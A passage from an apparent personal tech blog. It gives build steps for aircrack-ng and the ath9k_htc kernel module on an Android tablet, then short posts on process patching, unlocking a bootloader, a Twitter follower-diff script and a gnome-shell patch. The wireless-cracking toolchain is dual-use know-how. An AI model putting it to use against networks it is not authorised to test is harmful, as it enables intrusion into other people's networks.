git clone https://github.com/aircrack-ng/aircrack-ng                         external/aircrack-ng
git clone https://github.com/CyanogenMod/android_external_openssl            external/openssl
git clone https://github.com/CobraDroid/android_external_libpcap.git         external/libpcap
git clone https://github.com/CyanogenMod/android_external_wireless-tools.git external/wireless-tools
patch -p1 -i android-aircrack.patch
ndk-build

4. Enjoy

ls -l android-iw-libnl3/android_toolchain/libs/armeabi libs/armeabi/

How to run aircrack-ng on your Android.

Here are the steps needed to build ath9k_htc.ko external module (& dependencies), and run aircrack-ng (& friends) on your Android. Enjoy!

—

1. Find your device properties so you can find the correct kernel sources. I use the following simple script which also prints out the next ‘make’ commands we need to type. Feel free to adjust the script to your system.

#!/bin/bash

CCOMPILER=arm-eabi-

# get properties from device
build_fingerprint=`adb shell getprop ro.build.fingerprint | tr -d "\r"`
board_platform=`adb shell getprop ro.board.platform | tr -d "\r"`
product_brand=`adb shell getprop ro.product.brand | tr -d "\r"`
manufacturer=`adb shell getprop ro.product.manufacturer | tr -d "\r"`
product_code=`adb shell getprop ril.product_code | tr -d "\r"`
product_model=`adb shell getprop ro.product.model | tr -d "\r"`
product_name=`adb shell getprop ro.product.name | tr -d "\r"`
product_device=`adb shell getprop ro.product.device | tr -d "\r"`
version_sdk=`adb shell getprop ro.build.version.sdk | tr -d "\r"`
version_release=`adb shell getprop ro.build.version.release | tr -d "\r"`

echo "manufacturer    = $manufacturer"
echo "product_brand   = $product_brand"
echo "board_platform  = $board_platform"
echo "product_code    = $product_code"
echo "product_model   = $product_model"
echo "product_name    = $product_name"
echo "product_device  = $product_device"
echo "version_sdk     = $version_sdk"
echo "version_release = $version_release"
echo "fingerprint     = $build_fingerprint"

echo
echo "run:"
echo "make ARCH=arm CROSS_COMPILE=${CCOMPILER} ${product_device}_defconfig"
echo "make ARCH=arm CROSS_COMPILE=${CCOMPILER} menuconfig"
echo "make ARCH=arm CROSS_COMPILE=${CCOMPILER} modules_prepare"
echo "make ARCH=arm CROSS_COMPILE=${CCOMPILER} modules"
echo "make ARCH=arm CROSS_COMPILE=${CCOMPILER} zImage"

run the script from your shell (make sure you have ‘adb’ in your PATH):

$ ./getprop
manufacturer    = unknown
product_brand   = Asus
board_platform  = tegra
product_code    =
product_model   = ME301T
product_name    = omni_me301t
product_device  = me301t
version_sdk     = 19
version_release = 4.4.2
fingerprint     = Asus/omni_me301t/me301t:4.4.2/KVT49L/eng.zbuild.20140314.170603:userdebug/test-keys

run:
make ARCH=arm CROSS_COMPILE=arm-eabi- me301t_defconfig
make ARCH=arm CROSS_COMPILE=arm-eabi- menuconfig
make ARCH=arm CROSS_COMPILE=arm-eabi- modules_prepare
make ARCH=arm CROSS_COMPILE=arm-eabi- modules
make ARCH=arm CROSS_COMPILE=arm-eabi- zImage

2. Find the kernel sources for your device. I had to switch to OMNI and then use OMNI kernel – this was the easiest for my device, but perhaps you will be luckier.

https://github.com

3. Configure your kernel to build ath9k_htc module. Here are the commands I typed for my own device:

make ARCH=arm CROSS_COMPILE=arm-eabi- me301t_defconfig
make ARCH=arm CROSS_COMPILE=arm-eabi- menuconfig

Enable the following options:

[*] Networking support  --->
	-*-   Wireless  --->
		<*>   cfg80211 - wireless configuration API
		<M>   Generic IEEE 802.11 Networking Stack (mac80211)

Device Drivers  --->
	[*] Network device support  --->
		[*]   Wireless LAN  --->
			<M>   Atheros Wireless Cards  --->
				<M>   Atheros 802.11n wireless cards support
				<M>   Atheros HTC based wireless cards support

On some kernels you might need to ensure the followings:

file drivers/net/wireless/ath/Makefile :

obj-$(CONFIG_ATH9K_HW)          += ath9k/

file drivers/net/wireless/ath/Kconfig :

source "drivers/net/wireless/ath/ath9k/Kconfig"

And build the kernel modules & kernel:

make ARCH=arm CROSS_COMPILE=arm-eabi- modules_prepare
make ARCH=arm CROSS_COMPILE=arm-eabi- modules
make ARCH=arm CROSS_COMPILE=arm-eabi- zImage

4. Package your kernel & modules or deploy your modules directly to your device. Each manufacturer/device uses its own kernel-update procedure, so find a kernel package for your device to know what the right procedure for your own device.

5. Download the aircrack binaries and required utils from here:

https://code.google.com/p/bcmon/source/browse/#svn%2Ftrunk%2Futils

(More about compiling your own aircrack-ng/iw/wireless_tools – next time)

in-mem process patching

in-mem process patching using zSimulator.

I won’t go into details at this time, but this is just a small showcase of what can be done using zSimulator. Hopefully more to follow soon.

Unlocking the Sony Tablet S bootloader

English: An illustration of Sony S1 (codename) Honeycomb Tablet. (Photo credit: Wikipedia)

So, I’ve got myself a new Sony Tablet S. Cool device. However – locked bootloader? are you kidding me? are we back to the 80’s all over again?

Therefor, I think it is only sufficient to say, this should be a nice project, hopefully with interesting & helpful results – i recon this bootloader issue is the only thing standing between this tablet and xda popularity…

If anyone has any information regarding partition tables or ever better – some RE of the bootloader, please share here. once I have something to show off, I will post it here.

gluck to us all. ad astra per alas porci.

Twitter diff – bash script

Recently I’ve been planning a small twitter contest, but I had to find which new followers has joined, and who have left. So, I came up with this little script (which initially was ment to be a one-liner… yea right), I hope it will assist others as well.

#!/bin/bash
#
# twitter_diff.sh by z4ziggy
#
# handy yet dangerous utility - followers with weird chars in their names can
# cause unpredicted results but i'm too lazy to fix this. so be warned.
#
# change username to match desired twitter account to retrieve, or use 1st
# command line parameter as username.
#
username=z4ziggy

[ $# == 1 ] && username=$1

echo "[+] fetching followers for $username"
wget --quiet -O - http://api.twitter.com/1/followers/ids/$username.xml | grep "<id>" | sort > new.$username.xml
if [ -f $username.xml ]; then
        diff=$(diff -u0 $username.xml new.$username.xml)
        for id in $diff; do
                [ "${id:0:2}" != "+<" -a "${id:0:2}" != "-<" ] && continue

                user=$(echo ${id:1} | sed 's/<[^>]*>//g')
                wget http://api.twitter.com/1/users/show/$user.xml -O /tmp/$user.xml >/dev/null 2>&1
                f_sname=$(grep "<screen_name>" /tmp/$user.xml | sed 's/<[^>]*>//g;s/^[ ]*//')
                f_name=$(grep "<name>" /tmp/$user.xml | sed 's/<[^>]*>//g;s/^[ ]*//')
                f_count=$(grep "<followers_count>" /tmp/$user.xml | sed 's/<[^>]*>//g;s/^[ ]*//')

                [ "${id:0:2}" == "+<" ] && echo "[+] $f_sname ($f_name) joined (has $f_count followers) - http://twitter.com/#!/$f_sname"
                [ "${id:0:2}" == "-<" ] && echo "[-] $f_sname ($f_name) left (has $f_count followers) - http://twitter.com/#!/$f_sname"
        done
fi
mv new.$username.xml $username.xml
echo "[+] done"

 

Disable gnome-shell hotspot

I hate the new hot spot on gnome-shell. and as always with gnome, no option to disable it. here is a quick & ugly patch to accomplish that:

--- /usr/share/gnome-shell/js/ui/panel.org.js	2011-05-04 15:03:01.982247999 +0300
+++ /usr/share/gnome-shell/js/ui/panel.js	2011-05-04 15:03:13.175520693 +0300
@@ -761,7 +761,7 @@
     },
 
     _onCornerEntered : function() {
-        if (!this._entered) {
+        if (this._entered) {
             this._entered = true;
             if (!Main.overview.animationInProgress) {
                 this._activationTime = Date.now() / 1000;